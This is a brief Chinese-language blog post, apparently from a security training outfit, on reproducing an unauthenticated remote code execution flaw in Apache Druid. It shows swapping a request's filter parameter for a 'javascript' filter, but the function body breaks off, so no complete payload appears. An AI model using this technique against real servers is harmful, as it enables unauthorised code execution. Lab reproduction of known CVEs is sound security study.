雨笋教育小编又来分享渗透技术文干货了，这次来复盘一次Apache Druid CVE漏洞。

Apache Druid 是用Java编写的面向列的开源分布式数据存储，旨在快速获取大量事件数据，并在数据之上提供低延迟查询。

Apache Druid 默认情况下缺乏授权认证，攻击者可以发送特制请求，利用Druid服务器上进程的特权执行任意代码。

自行搭建测试环境

复现流程

此处路径与文件填下面的值quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

抓包filter 参数{"type":"selector","dimension":"","value":""}}}

改成{"type": "javascript", "dimension": "added", "function": "function(value)

渗透技术干货持续分享关注雨笋教育公众号：雨笋君！

渗透技术交流群：718860842

*本文章仅供技术交流分享，请勿做未授权违法攻击，雨笋教育不负任何责任。具体请参考《网络安全法》

本文作者：雨笋教育-丹丹

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/161292.html